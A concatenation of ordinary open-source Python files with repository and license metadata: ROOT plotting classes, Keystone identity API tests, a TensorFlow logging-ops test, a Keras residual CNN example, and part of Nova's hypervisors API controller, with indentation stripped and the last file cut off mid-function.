label = TPaveText(xmin, ymin, xmax, ymax, "NDC")
label.SetBorderSize(0)
label.SetFillStyle(0)
label.SetTextFont(42)
label.AddText(text)
label.Draw()
self.__labels.append(label)
def GetPad(self):
"""
Provide direct access to the pad
@return: Underlying ROOT pad
"""
return self.__pad
class _FrameContainer:
"""
Container for framed pad objects
"""
def __init__(self):
"""
Create new empty frame container
"""
self.__Frames = {}
def AddFrame(self, frameID, frame):
"""
Add a new framed pad to the frame container
@param frameID: ID of the frame
@param frame: Frame to be added for pad with ID
"""
self.__Frames[frameID] = frame
def GetFrame(self, frameID):
"""
Provide access to frame
@param frameID: ID of the frame
@return: The frame for the pad
"""
if not self.__Frames.has_key(frameID):
return None
return self.__Frames[frameID]
def __init__(self):
"""
Initialise new plot
"""
self._canvas = None
self._frames = self._FrameContainer()
def _OpenCanvas(self, canvasname, canvastitle, xsize = 1000, ysize = 800):
"""
Initialise canvas with name, title and sizes
@param canvasname: Name of the canvas
@param canvastitle: Title of the canvas
@param xsize: Canvas size in x-direction
@param ysize: Canvas size in y-direction
"""
self._canvas = TCanvas(canvasname, canvastitle, xsize, ysize)
self._canvas.cd()
def SaveAs(self, filenamebase):
"""
Save plot to files:
Creating a file with a common name in the formats
eps, pdf, jpeg, gif and pdf
@param filenamebase: Basic part of the filename (without endings)
"""
for t in ["eps", "pdf", "jpeg", "gif", "png"]:
self._canvas.SaveAs("%s.%s" %(filenamebase, t))
class SinglePanelPlot(PlotBase):
def __init__(self):
"""
Initialise single panel plot
"""
PlotBase.__init__(self)
def _OpenCanvas(self, canvasname, canvastitle):
"""
Create canvas and add it to the list of framed pads
@param canvasname: Name of the canvas
@param canvastitle: Title of the canvas
"""
PlotBase._OpenCanvas(self, canvasname, canvastitle, 1000, 800)
self._frames.AddFrame(0, self._FramedPad(self._canvas))
def _GetFramedPad(self):
"""
Access to framed pad
@return: The underlying framed pad
"""
return self._frames.GetFrame(0)
class MultipanelPlot(PlotBase):
"""
Base Class For multiple panel plots
"""
def __init__(self, nrow, ncol):
"""
Create new Multi-panel plot with a given number of row and cols
"""
PlotBase.__init__(self)
self.__nrow = nrow
self.__ncol = ncol
def _OpenCanvas(self, canvasname, canvastitle, xsize, ysize):
"""
Create new canvas and split it into the amount of pads as defined
@param canvasname: Name of the canvas
@param canvastitle: Title of the canvas
@param xsize: Canvas size in x-direction
@param ysize: Canvas size in y-direction
"""
PlotBase._OpenCanvas(self, canvasname, canvastitle, xsize, ysize)
self._canvas.Divide(self.__ncol, self.__nrow)
def _OpenPad(self, padID):
"""
Create new framed pad in a multi-panel plot for a given pad ID
@param padID: ID number of the pad
@return: The framed pad
"""
if padID < 0 or padID > self.__GetMaxPadID():
return None
mypad = self._GetPad(padID)
if not mypad:
mypad = self._FramedPad(self._canvas.cd(padID+1))
self._frames.AddFrame(padID, mypad)
return mypad
def _OpenPadByRowCol(self, row, col):
"""
Create new framed pad in a multi-panel plot for a given row an col
@param row: row of the pad
@param col: column of the pad
@return: The new pad at this position
"""
return self._OpenPad(self.__GetPadID(row, col))
def _GetPad(self, padID):
"""
Access to Pads by pad ID
@param padID: ID number of the pad
@return: The framed pad
"""
return self._frames.GetFrame(padID)
def _GetPadByRowCol(self, row, col):
"""
Access Pad by row and col
@param row: row of the pad
@param col: column of the pad
@return: The pad at this position
"""
return self._frames.GetFrame(self.__GetPadID(row, col))
def __GetPadID(self, row, col):
"""
Calculate ID of the pad
@param row: row of the pad
@param col: column of the pad
@return: The pad ID for this combination
"""
if (row < 0 or row >= self.__nrow) or (col < 0 or col >= self.__ncol):
return -1
return 1 + row * self.__ncol + col
def __GetMaxPadID(self):
"""
Calculate the maximum allowed pad ID
@return: The maximum pad ID
"""
return 1 + self.__ncol * self.__nrow
class TwoPanelPlot(MultipanelPlot):
"""
A plot with two panels
"""
def __init__(self):
"""
Initialise two-panel plot
"""
MultipanelPlot.__init__(self, 1, 2)
def _CreateCanvas(self, canvasname, canvastitle):
"""
Create Canvas with the dimensions of a four-panel plot
@param canvasname: Name of the canvas
@param canvastitle: Title of the canvas
"""
MultipanelPlot._OpenCanvas(self, canvasname, canvastitle, 1000, 500)
class FourPanelPlot(MultipanelPlot):
"""
A plot with four (2x2) panels
"""
def __init__(self):
"""
Initialise four-panel plot
"""
MultipanelPlot.__init__(self, 2, 2)
def _OpenCanvas(self, canvasname, canvastitle):
"""
Create Canvas with the dimensions of a four-panel plot
@param canvasname: Name of the canvas
@param canvastitle: Title of the canvas
"""
MultipanelPlot._OpenCanvas(self, canvasname, canvastitle, 1000, 1000) | bsd-3-clause |
yanheven/keystone | keystone/tests/unit/test_v3_identity.py | 6 | 24955 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from oslo_config import cfg
from testtools import matchers
from keystone.common import controller
from keystone import exception
from keystone.tests import unit as tests
from keystone.tests.unit import test_v3
CONF = cfg.CONF
class IdentityTestCase(test_v3.RestfulTestCase):
"""Test users and groups."""
def setUp(self):
super(IdentityTestCase, self).setUp()
self.group = self.new_group_ref(
domain_id=self.domain_id)
self.group = self.identity_api.create_group(self.group)
self.group_id = self.group['id']
self.credential_id = uuid.uuid4().hex
self.credential = self.new_credential_ref(
user_id=self.user['id'],
project_id=self.project_id)
self.credential['id'] = self.credential_id
self.credential_api.create_credential(
self.credential_id,
self.credential)
# user crud tests
def test_create_user(self):
"""Call ``POST /users``."""
ref = self.new_user_ref(domain_id=self.domain_id)
r = self.post(
'/users',
body={'user': ref})
return self.assertValidUserResponse(r, ref)
def test_create_user_without_domain(self):
"""Call ``POST /users`` without specifying domain.
According to the identity-api specification, if you do not
explicitly specific the domain_id in the entity, it should
take the domain scope of the token as the domain_id.
"""
# Create a user with a role on the domain so we can get a
# domain scoped token
domain = self.new_domain_ref()
self.resource_api.create_domain(domain['id'], domain)
user = self.new_user_ref(domain_id=domain['id'])
password = user['password']
user = self.identity_api.create_user(user)
user['password'] = password
self.assignment_api.create_grant(
role_id=self.role_id, user_id=user['id'],
domain_id=domain['id'])
ref = self.new_user_ref(domain_id=domain['id'])
ref_nd = ref.copy()
ref_nd.pop('domain_id')
auth = self.build_authentication_request(
user_id=user['id'],
password=user['password'],
domain_id=domain['id'])
r = self.post('/users', body={'user': ref_nd}, auth=auth)
self.assertValidUserResponse(r, ref)
# Now try the same thing without a domain token - which should fail
ref = self.new_user_ref(domain_id=domain['id'])
ref_nd = ref.copy()
ref_nd.pop('domain_id')
auth = self.build_authentication_request(
user_id=self.user['id'],
password=self.user['password'],
project_id=self.project['id'])
r = self.post('/users', body={'user': ref_nd}, auth=auth)
# TODO(henry-nash): Due to bug #1283539 we currently automatically
# use the default domain_id if a domain scoped token is not being
# used. Change the code below to expect a failure once this bug is
# fixed.
ref['domain_id'] = CONF.identity.default_domain_id
return self.assertValidUserResponse(r, ref)
def test_create_user_400(self):
"""Call ``POST /users``."""
self.post('/users', body={'user': {}}, expected_status=400)
def test_list_users(self):
"""Call ``GET /users``."""
resource_url = '/users'
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=self.user,
resource_url=resource_url)
def test_list_users_with_multiple_backends(self):
"""Call ``GET /users`` when multiple backends is enabled.
In this scenario, the controller requires a domain to be specified
either as a filter or by using a domain scoped token.
"""
self.config_fixture.config(group='identity',
domain_specific_drivers_enabled=True)
# Create a user with a role on the domain so we can get a
# domain scoped token
domain = self.new_domain_ref()
self.resource_api.create_domain(domain['id'], domain)
user = self.new_user_ref(domain_id=domain['id'])
password = user['password']
user = self.identity_api.create_user(user)
user['password'] = password
self.assignment_api.create_grant(
role_id=self.role_id, user_id=user['id'],
domain_id=domain['id'])
ref = self.new_user_ref(domain_id=domain['id'])
ref_nd = ref.copy()
ref_nd.pop('domain_id')
auth = self.build_authentication_request(
user_id=user['id'],
password=user['password'],
domain_id=domain['id'])
# First try using a domain scoped token
resource_url = '/users'
r = self.get(resource_url, auth=auth)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
# Now try with an explicit filter
resource_url = ('/users?domain_id=%(domain_id)s' %
{'domain_id': domain['id']})
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
# Now try the same thing without a domain token or filter,
# which should fail
r = self.get('/users', expected_status=exception.Unauthorized.code)
def test_list_users_with_static_admin_token_and_multiple_backends(self):
# domain-specific operations with the bootstrap ADMIN token is
# disallowed when domain-specific drivers are enabled
self.config_fixture.config(group='identity',
domain_specific_drivers_enabled=True)
self.get('/users', token=CONF.admin_token,
expected_status=exception.Unauthorized.code)
def test_list_users_no_default_project(self):
"""Call ``GET /users`` making sure no default_project_id."""
user = self.new_user_ref(self.domain_id)
user = self.identity_api.create_user(user)
resource_url = '/users'
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
def test_get_user(self):
"""Call ``GET /users/{user_id}``."""
r = self.get('/users/%(user_id)s' % {
'user_id': self.user['id']})
self.assertValidUserResponse(r, self.user)
def test_get_user_with_default_project(self):
"""Call ``GET /users/{user_id}`` making sure of default_project_id."""
user = self.new_user_ref(domain_id=self.domain_id,
project_id=self.project_id)
user = self.identity_api.create_user(user)
r = self.get('/users/%(user_id)s' % {'user_id': user['id']})
self.assertValidUserResponse(r, user)
def test_add_user_to_group(self):
"""Call ``PUT /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_list_groups_for_user(self):
"""Call ``GET /users/{user_id}/groups``."""
self.user1 = self.new_user_ref(
domain_id=self.domain['id'])
password = self.user1['password']
self.user1 = self.identity_api.create_user(self.user1)
self.user1['password'] = password
self.user2 = self.new_user_ref(
domain_id=self.domain['id'])
password = self.user2['password']
self.user2 = self.identity_api.create_user(self.user2)
self.user2['password'] = password
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user1['id']})
# Scenarios below are written to test the default policy configuration
# One should be allowed to list one's own groups
auth = self.build_authentication_request(
user_id=self.user1['id'],
password=self.user1['password'])
resource_url = ('/users/%(user_id)s/groups' %
{'user_id': self.user1['id']})
r = self.get(resource_url, auth=auth)
self.assertValidGroupListResponse(r, ref=self.group,
resource_url=resource_url)
# Administrator is allowed to list others' groups
resource_url = ('/users/%(user_id)s/groups' %
{'user_id': self.user1['id']})
r = self.get(resource_url)
self.assertValidGroupListResponse(r, ref=self.group,
resource_url=resource_url)
# Ordinary users should not be allowed to list other's groups
auth = self.build_authentication_request(
user_id=self.user2['id'],
password=self.user2['password'])
r = self.get('/users/%(user_id)s/groups' % {
'user_id': self.user1['id']}, auth=auth,
expected_status=exception.ForbiddenAction.code)
def test_check_user_in_group(self):
"""Call ``HEAD /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
self.head('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_list_users_in_group(self):
"""Call ``GET /groups/{group_id}/users``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
resource_url = ('/groups/%(group_id)s/users' %
{'group_id': self.group_id})
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=self.user,
resource_url=resource_url)
self.assertIn('/groups/%(group_id)s/users' % {
'group_id': self.group_id}, r.result['links']['self'])
def test_remove_user_from_group(self):
"""Call ``DELETE /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
self.delete('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_update_user(self):
"""Call ``PATCH /users/{user_id}``."""
user = self.new_user_ref(domain_id=self.domain_id)
del user['id']
r = self.patch('/users/%(user_id)s' % {
'user_id': self.user['id']},
body={'user': user})
self.assertValidUserResponse(r, user)
def test_admin_password_reset(self):
# bootstrap a user as admin
user_ref = self.new_user_ref(domain_id=self.domain['id'])
password = user_ref['password']
user_ref = self.identity_api.create_user(user_ref)
# auth as user should work before a password change
old_password_auth = self.build_authentication_request(
user_id=user_ref['id'],
password=password)
r = self.v3_authenticate_token(old_password_auth, expected_status=201)
old_token = r.headers.get('X-Subject-Token')
# auth as user with a token should work before a password change
old_token_auth = self.build_authentication_request(token=old_token)
self.v3_authenticate_token(old_token_auth, expected_status=201)
# administrative password reset
new_password = uuid.uuid4().hex
self.patch('/users/%s' % user_ref['id'],
body={'user': {'password': new_password}},
expected_status=200)
# auth as user with original password should not work after change
self.v3_authenticate_token(old_password_auth, expected_status=401)
# auth as user with an old token should not work after change
self.v3_authenticate_token(old_token_auth, expected_status=404)
# new password should work
new_password_auth = self.build_authentication_request(
user_id=user_ref['id'],
password=new_password)
self.v3_authenticate_token(new_password_auth, expected_status=201)
def test_update_user_domain_id(self):
"""Call ``PATCH /users/{user_id}`` with domain_id."""
user = self.new_user_ref(domain_id=self.domain['id'])
user = self.identity_api.create_user(user)
user['domain_id'] = CONF.identity.default_domain_id
r = self.patch('/users/%(user_id)s' % {
'user_id': user['id']},
body={'user': user},
expected_status=exception.ValidationError.code)
self.config_fixture.config(domain_id_immutable=False)
user['domain_id'] = self.domain['id']
r = self.patch('/users/%(user_id)s' % {
'user_id': user['id']},
body={'user': user})
self.assertValidUserResponse(r, user)
def test_delete_user(self):
"""Call ``DELETE /users/{user_id}``.
As well as making sure the delete succeeds, we ensure
that any credentials that reference this user are
also deleted, while other credentials are unaffected.
In addition, no tokens should remain valid for this user.
"""
# First check the credential for this user is present
r = self.credential_api.get_credential(self.credential['id'])
self.assertDictEqual(r, self.credential)
# Create a second credential with a different user
self.user2 = self.new_user_ref(
domain_id=self.domain['id'],
project_id=self.project['id'])
self.user2 = self.identity_api.create_user(self.user2)
self.credential2 = self.new_credential_ref(
user_id=self.user2['id'],
project_id=self.project['id'])
self.credential_api.create_credential(
self.credential2['id'],
self.credential2)
# Create a token for this user which we can check later
# gets deleted
auth_data = self.build_authentication_request(
user_id=self.user['id'],
password=self.user['password'],
project_id=self.project['id'])
token = self.get_requested_token(auth_data)
# Confirm token is valid for now
self.head('/auth/tokens',
headers={'X-Subject-Token': token},
expected_status=200)
# Now delete the user
self.delete('/users/%(user_id)s' % {
'user_id': self.user['id']})
# Deleting the user should have deleted any credentials
# that reference this project
self.assertRaises(exception.CredentialNotFound,
self.credential_api.get_credential,
self.credential['id'])
# And the no tokens we remain valid
tokens = self.token_provider_api._persistence._list_tokens(
self.user['id'])
self.assertEqual(0, len(tokens))
# But the credential for user2 is unaffected
r = self.credential_api.get_credential(self.credential2['id'])
self.assertDictEqual(r, self.credential2)
# group crud tests
def test_create_group(self):
"""Call ``POST /groups``."""
ref = self.new_group_ref(domain_id=self.domain_id)
r = self.post(
'/groups',
body={'group': ref})
return self.assertValidGroupResponse(r, ref)
def test_create_group_400(self):
"""Call ``POST /groups``."""
self.post('/groups', body={'group': {}}, expected_status=400)
def test_list_groups(self):
"""Call ``GET /groups``."""
resource_url = '/groups'
r = self.get(resource_url)
self.assertValidGroupListResponse(r, ref=self.group,
resource_url=resource_url)
def test_get_group(self):
"""Call ``GET /groups/{group_id}``."""
r = self.get('/groups/%(group_id)s' % {
'group_id': self.group_id})
self.assertValidGroupResponse(r, self.group)
def test_update_group(self):
"""Call ``PATCH /groups/{group_id}``."""
group = self.new_group_ref(domain_id=self.domain_id)
del group['id']
r = self.patch('/groups/%(group_id)s' % {
'group_id': self.group_id},
body={'group': group})
self.assertValidGroupResponse(r, group)
def test_update_group_domain_id(self):
"""Call ``PATCH /groups/{group_id}`` with domain_id."""
group = self.new_group_ref(domain_id=self.domain['id'])
group = self.identity_api.create_group(group)
group['domain_id'] = CONF.identity.default_domain_id
r = self.patch('/groups/%(group_id)s' % {
'group_id': group['id']},
body={'group': group},
expected_status=exception.ValidationError.code)
self.config_fixture.config(domain_id_immutable=False)
group['domain_id'] = self.domain['id']
r = self.patch('/groups/%(group_id)s' % {
'group_id': group['id']},
body={'group': group})
self.assertValidGroupResponse(r, group)
def test_delete_group(self):
"""Call ``DELETE /groups/{group_id}``."""
self.delete('/groups/%(group_id)s' % {
'group_id': self.group_id})
class IdentityV3toV2MethodsTestCase(tests.TestCase):
"""Test users V3 to V2 conversion methods."""
def setUp(self):
super(IdentityV3toV2MethodsTestCase, self).setUp()
self.load_backends()
self.user_id = uuid.uuid4().hex
self.default_project_id = uuid.uuid4().hex
self.tenant_id = uuid.uuid4().hex
self.domain_id = uuid.uuid4().hex
# User with only default_project_id in ref
self.user1 = {'id': self.user_id,
'name': self.user_id,
'default_project_id': self.default_project_id,
'domain_id': self.domain_id}
# User without default_project_id or tenantId in ref
self.user2 = {'id': self.user_id,
'name': self.user_id,
'domain_id': self.domain_id}
# User with both tenantId and default_project_id in ref
self.user3 = {'id': self.user_id,
'name': self.user_id,
'default_project_id': self.default_project_id,
'tenantId': self.tenant_id,
'domain_id': self.domain_id}
# User with only tenantId in ref
self.user4 = {'id': self.user_id,
'name': self.user_id,
'tenantId': self.tenant_id,
'domain_id': self.domain_id}
# Expected result if the user is meant to have a tenantId element
self.expected_user = {'id': self.user_id,
'name': self.user_id,
'username': self.user_id,
'tenantId': self.default_project_id}
# Expected result if the user is not meant to have a tenantId element
self.expected_user_no_tenant_id = {'id': self.user_id,
'name': self.user_id,
'username': self.user_id}
def test_v3_to_v2_user_method(self):
updated_user1 = controller.V2Controller.v3_to_v2_user(self.user1)
self.assertIs(self.user1, updated_user1)
self.assertDictEqual(self.user1, self.expected_user)
updated_user2 = controller.V2Controller.v3_to_v2_user(self.user2)
self.assertIs(self.user2, updated_user2)
self.assertDictEqual(self.user2, self.expected_user_no_tenant_id)
updated_user3 = controller.V2Controller.v3_to_v2_user(self.user3)
self.assertIs(self.user3, updated_user3)
self.assertDictEqual(self.user3, self.expected_user)
updated_user4 = controller.V2Controller.v3_to_v2_user(self.user4)
self.assertIs(self.user4, updated_user4)
self.assertDictEqual(self.user4, self.expected_user_no_tenant_id)
def test_v3_to_v2_user_method_list(self):
user_list = [self.user1, self.user2, self.user3, self.user4]
updated_list = controller.V2Controller.v3_to_v2_user(user_list)
self.assertEqual(len(updated_list), len(user_list))
for i, ref in enumerate(updated_list):
# Order should not change.
self.assertIs(ref, user_list[i])
self.assertDictEqual(self.user1, self.expected_user)
self.assertDictEqual(self.user2, self.expected_user_no_tenant_id)
self.assertDictEqual(self.user3, self.expected_user)
self.assertDictEqual(self.user4, self.expected_user_no_tenant_id)
class UserSelfServiceChangingPasswordsTestCase(test_v3.RestfulTestCase):
def setUp(self):
super(UserSelfServiceChangingPasswordsTestCase, self).setUp()
self.user_ref = self.new_user_ref(domain_id=self.domain['id'])
password = self.user_ref['password']
self.user_ref = self.identity_api.create_user(self.user_ref)
self.user_ref['password'] = password
self.token = self.get_request_token(self.user_ref['password'], 201)
def get_request_token(self, password, expected_status):
auth_data = self.build_authentication_request(
user_id=self.user_ref['id'],
password=password)
r = self.v3_authenticate_token(auth_data,
expected_status=expected_status)
return r.headers.get('X-Subject-Token')
def change_password(self, expected_status, **kwargs):
"""Returns a test response for a change password request."""
return self.post('/users/%s/password' % self.user_ref['id'],
body={'user': kwargs},
token=self.token,
expected_status=expected_status)
def test_changing_password(self):
# original password works
token_id = self.get_request_token(self.user_ref['password'],
expected_status=201)
# original token works
old_token_auth = self.build_authentication_request(token=token_id)
self.v3_authenticate_token(old_token_auth, expected_status=201)
# change password
new_password = uuid.uuid4().hex
self.change_password(password=new_password,
original_password=self.user_ref['password'],
expected_status=204)
# old password fails
self.get_request_token(self.user_ref['password'], expected_status=401)
# old token fails
self.v3_authenticate_token(old_token_auth, expected_status=404)
# new password works
self.get_request_token(new_password, expected_status=201)
def test_changing_password_with_missing_original_password_fails(self):
r = self.change_password(password=uuid.uuid4().hex,
expected_status=400)
self.assertThat(r.result['error']['message'],
matchers.Contains('original_password'))
def test_changing_password_with_missing_password_fails(self):
r = self.change_password(original_password=self.user_ref['password'],
expected_status=400)
self.assertThat(r.result['error']['message'],
matchers.Contains('password'))
def test_changing_password_with_incorrect_password_fails(self):
self.change_password(password=uuid.uuid4().hex,
original_password=uuid.uuid4().hex,
expected_status=401)
def test_changing_password_with_disabled_user_fails(self):
# disable the user account
self.user_ref['enabled'] = False
self.patch('/users/%s' % self.user_ref['id'],
body={'user': self.user_ref})
self.change_password(password=uuid.uuid4().hex,
original_password=self.user_ref['password'],
expected_status=401)
| apache-2.0 |
anand-c-goog/tensorflow | tensorflow/python/kernel_tests/logging_ops_test.py | 29 | 2411 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.kernels.logging_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
class LoggingOpsTest(tf.test.TestCase):
def testAssertDivideByZero(self):
with self.test_session() as sess:
epsilon = tf.convert_to_tensor(1e-20)
x = tf.convert_to_tensor(0.0)
y = tf.convert_to_tensor(1.0)
z = tf.convert_to_tensor(2.0)
# assert(epsilon < y)
# z / y
with sess.graph.control_dependencies(
[tf.Assert(tf.less(epsilon, y), ["Divide-by-zero"])]):
out = tf.div(z, y)
self.assertAllEqual(2.0, out.eval())
# assert(epsilon < x)
# z / x
#
# This tests printing out multiple tensors
with sess.graph.control_dependencies(
[tf.Assert(tf.less(epsilon, x),
["Divide-by-zero", "less than x"])]):
out = tf.div(z, x)
with self.assertRaisesOpError("less than x"):
out.eval()
class PrintGradientTest(tf.test.TestCase):
def testPrintShape(self):
inp = tf.constant(2.0, shape=[100, 32])
inp_printed = tf.Print(inp, [inp])
self.assertEqual(inp.get_shape(), inp_printed.get_shape())
def testPrintGradient(self):
with self.test_session():
inp = tf.constant(2.0, shape=[100, 32], name="in")
w = tf.constant(4.0, shape=[10, 100], name="w")
wx = tf.matmul(w, inp, name="wx")
wx_print = tf.Print(wx, [w, w, w])
wx_grad = tf.gradients(wx, w)[0]
wx_print_grad = tf.gradients(wx_print, w)[0]
wxg = wx_grad.eval()
wxpg = wx_print_grad.eval()
self.assertAllEqual(wxg, wxpg)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
lukas/scikit-class | examples/keras-cnn/resnet-cnn.py | 2 | 1929 | from keras.datasets import mnist
from keras.models import Sequential, Model
from keras.layers import Conv2D, MaxPooling2D, Dropout, Dense, Flatten, Input, Add
from keras.utils import np_utils
from wandb.keras import WandbCallback
import wandb
import os
run = wandb.init()
config = run.config
config.first_layer_convs = 32
config.first_layer_conv_width = 3
config.first_layer_conv_height = 3
config.dropout = 0.2
config.dense_layer_size = 128
config.img_width = 28
config.img_height = 28
config.epochs = 10
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = X_train.astype('float32')
X_train /= 255.
X_test = X_test.astype('float32')
X_test /= 255.
# reshape input data
X_train = X_train.reshape(
X_train.shape[0], config.img_width, config.img_height, 1)
X_test = X_test.reshape(
X_test.shape[0], config.img_width, config.img_height, 1)
# one hot encode outputs
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
num_classes = y_test.shape[1]
labels = [str(i) for i in range(10)]
# build model
input = Input(shape=(28, 28, 1))
input_copy = input
conv_out = Conv2D(32,
(config.first_layer_conv_width, config.first_layer_conv_height),
activation='relu', padding='same')(input)
res_input = Conv2D(32, (1, 1), activation='relu', padding='same')(input)
add_out = Add()([conv_out, res_input])
max_pool_out = MaxPooling2D(pool_size=(2, 2))(conv_out)
flatten_out = Flatten()(max_pool_out)
dense1_out = Dense(config.dense_layer_size, activation='relu')(flatten_out)
dense2_out = Dense(num_classes, activation='softmax')(dense1_out)
model = Model(input, dense2_out)
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
model.fit(X_train, y_train, validation_data=(X_test, y_test),
epochs=config.epochs,
callbacks=[WandbCallback(data_type="image", save_model=False)])
| gpl-2.0 |
bigswitch/nova | nova/api/openstack/compute/hypervisors.py | 3 | 8033 | # Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hypervisors admin extension."""
import webob.exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.i18n import _
from nova import servicegroup
ALIAS = "os-hypervisors"
authorize = extensions.os_compute_authorizer(ALIAS)
class HypervisorsController(wsgi.Controller):
"""The Hypervisors API controller for the OpenStack API."""
def __init__(self):
self.host_api = compute.HostAPI()
self.servicegroup_api = servicegroup.API()
super(HypervisorsController, self).__init__()
def _view_hypervisor(self, hypervisor, service, detail, servers=None,
**kwargs):
alive = self.servicegroup_api.service_is_up(service)
hyp_dict = {
'id': hypervisor.id,
'hypervisor_hostname': hypervisor.hypervisor_hostname,
'state': 'up' if alive else 'down',
'status': ('disabled' if service.disabled
else 'enabled'),
}
if detail and not servers:
for field in ('vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
'memory_mb_used', 'local_gb_used',
'hypervisor_type', 'hypervisor_version',
'free_ram_mb', 'free_disk_gb', 'current_workload',
'running_vms', 'cpu_info', 'disk_available_least',
'host_ip'):
hyp_dict[field] = getattr(hypervisor, field)
hyp_dict['service'] = {
'id': service.id,
'host': hypervisor.host,
'disabled_reason': service.disabled_reason,
}
if servers:
hyp_dict['servers'] = [dict(name=serv['name'], uuid=serv['uuid'])
for serv in servers]
# Add any additional info
if kwargs:
hyp_dict.update(kwargs)
return hyp_dict
@extensions.expected_errors(())
def index(self, req):
context = req.environ['nova.context']
authorize(context)
compute_nodes = self.host_api.compute_node_get_all(context)
req.cache_db_compute_nodes(compute_nodes)
return dict(hypervisors=[self._view_hypervisor(
hyp,
self.host_api.service_get_by_compute_host(
context, hyp.host),
False)
for hyp in compute_nodes])
@extensions.expected_errors(())
def detail(self, req):
context = req.environ['nova.context']
authorize(context)
compute_nodes = self.host_api.compute_node_get_all(context)
req.cache_db_compute_nodes(compute_nodes)
return dict(hypervisors=[self._view_hypervisor(
hyp,
self.host_api.service_get_by_compute_host(
context, hyp.host),
True)
for hyp in compute_nodes])
@extensions.expected_errors(404)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
hyp = self.host_api.compute_node_get(context, id)
req.cache_db_compute_node(hyp)
except (ValueError, exception.ComputeHostNotFound):
msg = _("Hypervisor with ID '%s' could not be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
service = self.host_api.service_get_by_compute_host(
context, hyp.host)
return dict(hypervisor=self._view_hypervisor(hyp, service, True))
@extensions.expected_errors((400, 404, 501))
def uptime(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
hyp = self.host_api.compute_node_get(context, id)
req.cache_db_compute_node(hyp)
except (ValueError, exception.ComputeHostNotFound):
msg = _("Hypervisor with ID '%s' could not be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
# Get the uptime
try:
host = hyp.host
uptime = self.host_api.get_host_uptime(context, host)
except NotImplementedError:
common.raise_feature_not_supported()
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
service = self.host_api.service_get_by_compute_host(context, host)
return dict(hypervisor=self._view_hypervisor(hyp, service, False,
uptime=uptime))
@extensions.expected_errors(404)
def search(self, req, id):
context = req.environ['nova.context']
authorize(context)
hypervisors = self.host_api.compute_node_search_by_hypervisor(
context, id)
if hypervisors:
return dict(hypervisors=[self._view_hypervisor(
hyp,
self.host_api.service_get_by_compute_host(
context, hyp.host),
False)
for hyp in hypervisors])
else:
msg = _("No hypervisor matching '%s' could be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
@extensions.expected_errors(404)
def servers(self, req, id):
context = req.environ['nova.context']
authorize(context)
compute_nodes = self.host_api.compute_node_search_by_hypervisor(
context, id)
if not compute_nodes:
msg = _("No hypervisor matching '%s' could be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
hypervisors = []
for compute_node in compute_nodes:
instances = self.host_api.instance_get_all_by_host(context,
compute_node.host)
service = self.host_api.service_get_by_compute_host(
context, compute_node.host)
hyp = self._view_hypervisor(compute_node, service, False,
instances)
hypervisors.append(hyp)
return dict(hypervisors=hypervisors)
@extensions.expected_errors(())
def statistics(self, req):
context = req.environ['nova.context']
authorize(context)
stats = self.host_api.compute_node_statistics(context)
return dict(hypervisor_statistics=stats)
class Hypervisors(extensions.V21APIExtensionBase):
"""Admin-only hypervisor administration."""
name = "Hypervisors"
alias = ALIAS
version = 1
def get_resources(self):
resources = [extensions.ResourceExtension(ALIAS,
HypervisorsController(),
